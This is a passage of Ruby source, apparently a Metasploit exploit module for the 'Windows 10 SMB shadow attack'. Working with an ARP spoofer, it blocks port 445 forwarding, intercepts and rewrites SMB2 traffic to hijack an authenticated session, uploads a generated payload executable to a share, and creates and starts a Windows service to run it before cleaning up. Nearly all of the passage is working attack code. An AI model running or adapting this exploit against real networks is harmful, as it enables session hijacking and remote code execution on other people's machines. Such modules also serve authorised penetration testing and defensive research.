fail_with(Failure::BadConfig, "Interface does not have address: #{@interface}") unless @ip4&.count('.') == 3 @mac = get_mac(@interface) fail_with(Failure::BadConfig, "Interface does not have mac: #{@interface}") unless @mac && @mac.instance_of?(String) # For future cross LAN work: (Gateway is required.) # @gateip4 = datastore['GATEWAY'] # fail_with(Failure::BadConfig, "Invalid Gateway ip address: #{@gateip4}") unless @gateip4&.count(".") == 3 # @gatemac = arp(tpa: @gateip4) # fail_with(Failure::BadConfig, "Unable to retrieve Gateway mac address: #{@gateip4}") unless @gatemac && @gatemac.class == String @share = datastore['SHARE'] print_status("Self: #{@ip4} | #{@mac}") # print_status("Gateway: #{@gateip4} | #{@gatemac}") disable_p445_fwrd start_syn_capture start_ack_capture print_status('INFO : This module must be run alongside an arp spoofer / poisoner.') print_status('INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.') main_capture ensure cleanup end # This prevents the TCP SYN on port 445 from passing through the filter. # This allows us to have the time to modify the packets before forwarding them. def disable_p445_fwrd if datastore['DisableFwd'] == 'false' print_status('DisableFwd was set to false.') print_status('Packet forwarding on port 445 will not be disabled.') return true end if RUBY_PLATFORM.include?('darwin') pfctl = Rex::FileUtils.find_full_path('pfctl') unless pfctl fail_with(Failure::NotFound, 'The pfctl executable could not be found.') end IO.popen("#{pfctl} -a \"com.apple/shadow\" -f -", 'r+', err: '/dev/null') do |pf| pf.write("block out on #{@interface} proto tcp from any to any port 445\n") pf.close_write end IO.popen("#{pfctl} -e", err: '/dev/null').close elsif RUBY_PLATFORM.include?('linux') iptables = Rex::FileUtils.find_full_path('iptables') unless iptables fail_with(Failure::NotFound, 'The iptables executable could not be found.') end IO.popen("#{iptables} -A FORWARD -i #{@interface} -p tcp --destination-port 445 -j DROP", err: '/dev/null').close else print_error("WARNING : Platform not supported: #{RUBY_PLATFORM}") print_error('WARNING : Packet forwarding on port 445 must be blocked manually.') fail_with(Failure::BadConfig, 'Set DisableFwd to false after blocking port 445 manually.') end print_good('INFO : Packet forwarding on port 445 disabled.') return true end # This reverts the changes made in disable_p445_fwrd def reset_p445_fwrd if datastore['DisableFwd'] == 'false' print_status('DisableFwd was set to false.') print_status('Packet forwarding on port 445 will not be reset.') return true end if RUBY_PLATFORM.include?('darwin') pfctl = Rex::FileUtils.find_full_path('pfctl') unless pfctl fail_with(Failure::NotFound, 'The pfctl executable could not be found.') end IO.popen("#{pfctl} -a \"com.apple/shadow\" -F rules", err: '/dev/null').close elsif RUBY_PLATFORM.include?('linux') iptables = Rex::FileUtils.find_full_path('iptables') unless iptables fail_with(Failure::NotFound, 'The iptables executable could not be found.') end IO.popen("#{iptables} -D FORWARD -i #{@interface} -p tcp --destination-port 445 -j DROP", err: '/dev/null').close end print_good('INFO : Packet forwarding on port 445 reset.') return true end # This starts the SYN capture thread as part of step two. def start_syn_capture @syn_capture_thread = Rex::ThreadFactory.spawn('SynCaptureThread', false) do c = PacketFu::Capture.new(iface: @interface, promisc: true) c.capture c.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and dst port 445 and tcp[tcpflags] & (tcp-syn) != 0 and tcp[tcpflags] & (tcp-ack) == 0") c.stream.each_data do |data| packet = PacketFu::Packet.parse(data) exists = @mutex.synchronize do @sessions[packet.tcp_header.tcp_src] # Prevent erasing existing sessions. end next if exists dstmac = arp(tpa: ip2str(int2ip(packet.ip_header.ip_dst))) # Time for the arp address to be spoofed again. sleep(1.5) @mutex.synchronize do @sessions[packet.tcp_header.tcp_src] = {} @sessions[packet.tcp_header.tcp_src][:acknum] = packet.tcp_header.tcp_ack @sessions[packet.tcp_header.tcp_src][:seqnum] = packet.tcp_header.tcp_seq @sessions[packet.tcp_header.tcp_src][:active] = true @sessions[packet.tcp_header.tcp_src][:dstmac] = dstmac packet.eth_header.eth_src = str2mac(@mac) packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac]) packet.to_w(@interface) end end end end # This starts the ACK capture thread as part of step two. def start_ack_capture @ack_capture_thread = Rex::ThreadFactory.spawn('AckCaptureThread', false) do c = PacketFu::Capture.new(iface: @interface, promisc: true) c.capture c.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and dst port 445 and tcp[tcpflags] & (tcp-syn) == 0 and tcp[tcpflags] & (tcp-ack) != 0 and tcp[((tcp[12] >> 4) * 4) + 4 : 4] != 0xfe534d42") c.stream.each_data do |data| packet = PacketFu::Packet.parse(data) @mutex.synchronize do next unless @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active] @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum] @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum] packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum] packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum] packet.eth_header.eth_src = str2mac(@mac) packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac]) packet.to_w(@interface) end end end end # This sends an arp packet out to the network and captures the response. # This allows us to resolve mac addresses in real time. # We need the mac address of the server and client. def arp(smac: @mac, dmac: 'ff:ff:ff:ff:ff:ff', sha: @mac, spa: @ip4, tha: '00:00:00:00:00:00', tpa: '', op: 1, capture: true) p = PacketFu::ARPPacket.new( eth_src: str2mac(smac), eth_dst: str2mac(dmac), arp_src_mac: str2mac(sha), arp_src_ip: str2ip(spa), arp_dst_mac: str2mac(tha), arp_dst_ip: str2ip(tpa), arp_opcode: op ) if capture c = PacketFu::Capture.new(iface: @interface) c.capture c.stream.setfilter("arp src #{tpa} and ether dst #{smac}") p.to_w(@interface) sleep 0.1 c.save c.array.each do |pkt| pkt = PacketFu::Packet.parse pkt # This decodes the arp packet and returns the query response. if pkt.arp_header.arp_src_ip == str2ip(tpa) return mac2str(pkt.arp_header.arp_src_mac) end return ip2str(pkt.arp_header.arp_src_ip) if mac2str(pkt.arp_header.src_mac) == tha end else p.to_w(@interface) end end # This returns a hash of local interfaces and their ip addresses. def ipv4_addresses results = {} Socket.getifaddrs.each do |iface| if iface.addr.ipv4? results[iface.name] = [] unless results[iface.name] results[iface.name] << iface.addr.ip_address end end results end # This is the main capture thread that handles all SMB packets routed through this module. def main_capture # This makes sense in the context of the paper. # Please read: https://strontium.io/blog/introducing-windows-10-smb-shadow-attack mc = PacketFu::Capture.new(iface: @interface, promisc: true) mc.capture mc.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and dst port 445 and tcp[tcpflags] & (tcp-syn) == 0 and tcp[tcpflags] & (tcp-ack) != 0 and tcp[((tcp[12] >> 4) * 4) + 4 : 4] = 0xfe534d42") mc.stream.each_data do |data| packet = PacketFu::Packet.parse(data) nss = packet.payload[0..3] smb2 = packet.payload[4..-1] # Only Parse Packets from known sessions @mutex.synchronize do if @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active] && (smb2[0..4] != "\xFFSMB") case smb2[11..12] when "\x00\x00" # Negotiate Protocol Request smb_packet = RubySMB::SMB2::Packet::NegotiateRequest.read(smb2) # Dialect Count Set To 1 smb_packet.dialect_count = 1 smb_packet.dialects = [smb_packet.dialects.first] smb_packet.negotiate_context_list = [] smb_packet.client_start_time = 0 # Re-Calculate Length: (Optional...) # nss = [smb_packet.to_binary_s.size].pack("N") packet.payload = "#{nss}#{smb_packet.to_binary_s}" when "\x00\x01" # Session Setup Request, NTLMSSP_AUTH smb_packet = RubySMB::SMB2::Packet::SessionSetupRequest.read(smb2) if smb_packet.smb2_header.session_id != 0 # Disable Session @sessions[packet.tcp_header.tcp_src][:active] = false @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum] @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum] # Start Main Thread @main_threads << Rex::ThreadFactory.spawn("MainThread#{@sessions.find_index do |k, _| k == packet.tcp_header.tcp_src end }", false) do main_thread(packet) end end end end next unless @sessions[packet.tcp_header.tcp_src] && @sessions[packet.tcp_header.tcp_src][:active] @sessions[packet.tcp_header.tcp_src][:acknum] += packet.tcp_header.tcp_ack - @sessions[packet.tcp_header.tcp_src][:acknum] @sessions[packet.tcp_header.tcp_src][:seqnum] += packet.tcp_header.tcp_seq - @sessions[packet.tcp_header.tcp_src][:seqnum] packet.tcp_header.tcp_ack = @sessions[packet.tcp_header.tcp_src][:acknum] packet.tcp_header.tcp_seq = @sessions[packet.tcp_header.tcp_src][:seqnum] packet.eth_header.eth_src = str2mac(@mac) packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac]) packet.recalc packet.to_w(@interface) end end end # This handles a session that has already authenticated to the server. # This allows us to offload the session from the main capture thead. def main_thread(packet) tree_id = 0 # Setup Vars process_id = 0 eth_src = str2mac(@mac) eth_dst = @mutex.synchronize { str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac]) } packet.tcp_header.tcp_ack = @mutex.synchronize { @sessions[packet.tcp_header.tcp_src][:acknum] } packet.tcp_header.tcp_seq = @mutex.synchronize { @sessions[packet.tcp_header.tcp_src][:seqnum] } packet.eth_header.eth_src = eth_src packet.eth_header.eth_dst = eth_dst response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::SessionSetupResponse.read(response.payload[4..-1]) print_status('Connecting to the defined share...') request = RubySMB::SMB2::Packet::TreeConnectRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.path = "\\\\#{ip2str(int2ip(response.ip_header.ip_src))}\\#{@share}" eth_header = PacketFu::EthHeader.new(eth_src: eth_src, eth_dst: eth_dst) ip_header = PacketFu::IPHeader.new(ip_src: int2ip(response.ip_header.ip_dst), ip_dst: int2ip(response.ip_header.ip_src)) packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::TreeConnectResponse.read(response.payload[4..-1]) if response_smb2.smb2_header.nt_status != 0 print_error("Unexpected tree connect response #{e.status_code.value.inspect} (#{::WindowsError::NTStatus.find_by_retval(e.status_code.value).first || 'unknown'})") return false end print_status('Regenerating the payload...') code = regenerate_payload tree_id = response_smb2.smb2_header.tree_id process_id = response_smb2.smb2_header.process_id print_status('Uploading payload...') filename = rand_text_alpha(8) + '.exe' servicename = rand_text_alpha(8) request = RubySMB::SMB2::Packet::CreateRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_attributes.directory = 0 request.file_attributes.normal = 1 request.create_options.directory_file = 0 request.create_options.non_directory_file = 1 request.share_access.read_access = 1 request.share_access.write_access = 1 request.desired_access.read_data = 1 request.desired_access.write_data = 1 request.desired_access.write_ea = 1 request.desired_access.read_attr = 1 request.desired_access.write_attr = 1 request.requested_oplock = 255 request.impersonation_level = RubySMB::ImpersonationLevels::SEC_IMPERSONATE request.create_disposition = RubySMB::Dispositions::FILE_SUPERSEDE request.name = filename.to_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::CreateResponse.read(response.payload[4..-1]) file_id = response_smb2.file_id opts = { servicename: servicename, code: code.encoded } opts.merge!({ arch: ARCH_X64 }) if datastore['PAYLOAD'].include?(ARCH_X64) exe = generate_payload_exe_service(opts) exe.bytes.each_slice(1000).to_a.each_with_index do |exe_fragment, exe_fragment_index| request = RubySMB::SMB2::Packet::WriteRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.write_offset = 1000 * exe_fragment_index request.buffer = exe_fragment.pack('C*') packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::WriteResponse.read(response.payload[4..-1]) end print_status("Created \\#{filename}...") request = RubySMB::SMB2::Packet::CloseRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::CloseResponse.read(response.payload[4..-1]) request = RubySMB::SMB2::Packet::TreeDisconnectRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::TreeDisconnectResponse.read(response.payload[4..-1]) print_status('Connecting to the Service Control Manager...') request = RubySMB::SMB2::Packet::TreeConnectRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.path = "\\\\#{ip2str(int2ip(response.ip_header.ip_src))}\\IPC$" packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::TreeConnectResponse.read(response.payload[4..-1]) tree_id = response_smb2.smb2_header.tree_id request = RubySMB::SMB2::Packet::CreateRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_attributes.directory = 0 request.file_attributes.normal = 1 request.create_options.directory_file = 0 request.create_options.non_directory_file = 1 request.share_access.read_access = 1 request.desired_access.read_data = 1 request.share_access.write_access = 1 request.desired_access.write_data = 1 request.requested_oplock = 255 request.impersonation_level = RubySMB::ImpersonationLevels::SEC_IMPERSONATE request.create_disposition = RubySMB::Dispositions::FILE_OPEN request.name = 'svcctl' packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::CreateResponse.read(response.payload[4..-1]) file_id = response_smb2.file_id bind_req = RubySMB::Dcerpc::Bind.new(endpoint: RubySMB::Dcerpc::Svcctl) request = RubySMB::SMB2::Packet::WriteRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.write_offset = 0 request.buffer = bind_req.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::WriteResponse.read(response.payload[4..-1]) request = RubySMB::SMB2::Packet::ReadRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.read_length = 1024 request.offset = 0 packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::ReadResponse.read(response.payload[4..-1]) open_scmw_request = RubySMB::Dcerpc::Svcctl::OpenSCManagerWRequest.new(dw_desired_access: 0x10 | 0x20 | 0x02 | 0x01 | 0x04 | 0x08 | 0x04) open_scmw_request.lp_machine_name = ip2str(int2ip(response.ip_header.ip_src)) open_scmw_request.lp_database_name = 'ServicesActive' dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: open_scmw_request.opnum }, { endpoint: 'Svcctl' }) dcerpc_request.stub.read(open_scmw_request.to_binary_s) request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) dcerpc_response = RubySMB::Dcerpc::Response.read(response_smb2.output_data) open_scmw_response = RubySMB::Dcerpc::Svcctl::OpenSCManagerWResponse.read(dcerpc_response.stub.to_s) servicename = rand_text_alpha(8) displayname = rand_text_alpha(rand(1..32)) print_status('Creating a new service...') # RubySMB does not support CreateService. stubdata = open_scmw_response.lp_sc_handle.to_binary_s + Rex::Encoder::NDR.wstring(servicename) + Rex::Encoder::NDR.uwstring(displayname) + Rex::Encoder::NDR.long(0x0F01FF) + # Access: MAX Rex::Encoder::NDR.long(0x00000110) + # Type: Interactive, Own process Rex::Encoder::NDR.long(0x00000003) + # Start: Demand Rex::Encoder::NDR.long(0x00000000) + # Errors: Ignore Rex::Encoder::NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path Rex::Encoder::NDR.long(0) + # LoadOrderGroup Rex::Encoder::NDR.long(0) + # Dependencies Rex::Encoder::NDR.long(0) + # Service Start Rex::Encoder::NDR.long(0) * 4 # Password dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: 12 }, { endpoint: 'Svcctl' }) dcerpc_request.stub = stubdata request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) if response_smb2.smb2_header.nt_status == 0x103 response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) end print_status('Closing service handle...') dcerpc_response = RubySMB::Dcerpc::Response.read(response_smb2.output_data) csh_request = RubySMB::Dcerpc::Svcctl::CloseServiceHandleRequest.new(h_sc_object: dcerpc_response.stub[4, 24]) dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: csh_request.opnum }, { endpoint: 'Svcctl' }) dcerpc_request.stub.read(csh_request.to_binary_s) request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) open_sw_request = RubySMB::Dcerpc::Svcctl::OpenServiceWRequest.new(dw_desired_access: 0x00F01FF) open_sw_request.lp_sc_handle = open_scmw_response.lp_sc_handle open_sw_request.lp_service_name = servicename dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: open_sw_request.opnum }, { endpoint: 'Svcctl' }) dcerpc_request.stub.read(open_sw_request.to_binary_s) request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) dcerpc_response = RubySMB::Dcerpc::Response.read(response_smb2.output_data) open_sw_response = RubySMB::Dcerpc::Svcctl::OpenServiceWResponse.read(dcerpc_response.stub.to_s) print_status('Starting the service...') ss_request = RubySMB::Dcerpc::Svcctl::StartServiceWRequest.new(h_service: open_sw_response.lp_sc_handle) dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: ss_request.opnum }, { endpoint: 'Svcctl' }) dcerpc_request.stub.read(ss_request.to_binary_s) request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) if response_smb2.smb2_header.nt_status == 0x103 response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) end print_status('Removing the service...') # RubySMB does not support DeleteService dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: 2 }, { endpoint: 'Svcctl' }) dcerpc_request.stub = open_sw_response.lp_sc_handle.to_binary_s request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) print_status('Closing service handle...') csh_request = RubySMB::Dcerpc::Svcctl::CloseServiceHandleRequest.new(h_sc_object: open_sw_response.lp_sc_handle) dcerpc_request = RubySMB::Dcerpc::Request.new({ opnum: csh_request.opnum }, { endpoint: 'Svcctl' }) dcerpc_request.stub.read(csh_request.to_binary_s) request = RubySMB::SMB2::Packet::IoctlRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_id = file_id request.ctl_code = 0x0011C017 request.flags.is_fsctl = 0x00000001 request.buffer = dcerpc_request.to_binary_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::IoctlResponse.read(response.payload[4..-1]) request = RubySMB::SMB2::Packet::TreeDisconnectRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::TreeDisconnectResponse.read(response.payload[4..-1]) print_status("Deleting \\#{filename}...") request = RubySMB::SMB2::Packet::TreeConnectRequest.new request.smb2_header.process_id = process_id request.smb2_header.credit_charge = 1 request.smb2_header.credits = 256 request.smb2_header.message_id = response_smb2.smb2_header.message_id + 1 request.smb2_header.session_id = response_smb2.smb2_header.session_id request.path = "\\\\#{ip2str(int2ip(response.ip_header.ip_src))}\\#{@share}" packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::TreeConnectResponse.read(response.payload[4..-1]) tree_id = response_smb2.smb2_header.tree_id request = RubySMB::SMB2::Packet::CreateRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_attributes.directory = 0 request.file_attributes.normal = 1 request.create_options.directory_file = 0 request.create_options.non_directory_file = 1 request.share_access.delete_access = 1 request.desired_access.delete_access = 1 request.requested_oplock = 255 request.impersonation_level = RubySMB::ImpersonationLevels::SEC_IMPERSONATE request.create_disposition = RubySMB::Dispositions::FILE_OPEN request.name = filename.to_s packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) response_smb2 = RubySMB::SMB2::Packet::CreateResponse.read(response.payload[4..-1]) request = RubySMB::SMB2::Packet::SetInfoRequest.new set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.file_info_class = RubySMB::Fscc::FileInformation::FILE_DISPOSITION_INFORMATION request.buffer.delete_pending = 1 request.file_id = response_smb2.file_id packet = PacketFu::TCPPacket.new(eth: eth_header, ip: ip_header, tcp: make_tcp_header(response)) packet.payload = "#{[request.to_binary_s.size].pack('N')}#{request.to_binary_s}" response = get_response(packet) return true # Done. end # This sends a packet and captures the response. def get_response(packet) packet.recalc rc = PacketFu::Capture.new(iface: @interface, promisc: true) rc.capture rc.stream.setfilter("ether dst #{@mac} and not ether src #{@mac} and src port 445 and tcp[tcpflags] & (tcp-syn) == 0 and tcp[tcpflags] & (tcp-ack) != 0 and tcp[((tcp[12] >> 4) * 4) + 4 : 4] = 0xfe534d42 and tcp[4:4] = #{packet.tcp_header.tcp_ack}") packet.to_w(@interface) rc.stream.each_data do |data| packet = PacketFu::Packet.parse(data) if packet.instance_of?(PacketFu::TCPPacket) break packet end end end # This generates the TCP header for a new packet based on the previous one. def make_tcp_header(response) PacketFu::TCPHeader.new( tcp_src: response.tcp_header.tcp_dst, tcp_dst: response.tcp_header.tcp_src, tcp_seq: response.tcp_header.tcp_ack, tcp_ack: response.tcp_header.tcp_seq + response.payload.size, tcp_win: response.tcp_header.tcp_win, tcp_flags: { ack: 1, psh: 1 } ) end # This sets the smb2 header flags on the request with the provided values. def set_request_smb2_header_flags(request, tree_id, process_id, response_smb2) request.smb2_header.tree_id = tree_id request.smb2_header.process_id = process_id request.smb2_header.credit_charge = 1 request.smb2_header.credits = 256 request.smb2_header.message_id = response_smb2.smb2_header.message_id + 1 request.smb2_header.session_id = response_smb2.smb2_header.session_id nil end # This converts a string to a binary mac. def str2mac(str) # [str.split(':').join].pack('H*') Rex::Socket.eth_aton(str) end # This converts a binary mac to a string. def mac2str(mac) # mac.to_s.bytes.map { |s| s.to_s(16).rjust(2, '0') }.join(':') Rex::Socket.eth_ntoa(mac) end # This converts a string to a binary ip. def str2ip(str) # str.split('.').map(&:to_i).pack('C*') Rex::Socket.addr_aton(str) end # This converts a binary ip to a string. def ip2str(ip) # ip.bytes.map(&:to_s).join('.') Rex::Socket.addr_ntoa(ip) end # This converts an integer to a binary ip. def int2ip(int) # [int].pack('N') Rex::Socket.addr_iton(int) end # This cleans up and exits all the active threads. def cleanup @cleanup_mutex.synchronize do unless @cleanedup print_status 'Cleaning Up...' @syn_capture_thread.exit if @syn_capture_thread @ack_capture_thread.exit if @ack_capture_thread @main_threads.map(&:exit) if @main_threads reset_p445_fwrd @cleanedup = true print_status 'Cleaned Up.' end end end end </code></pre>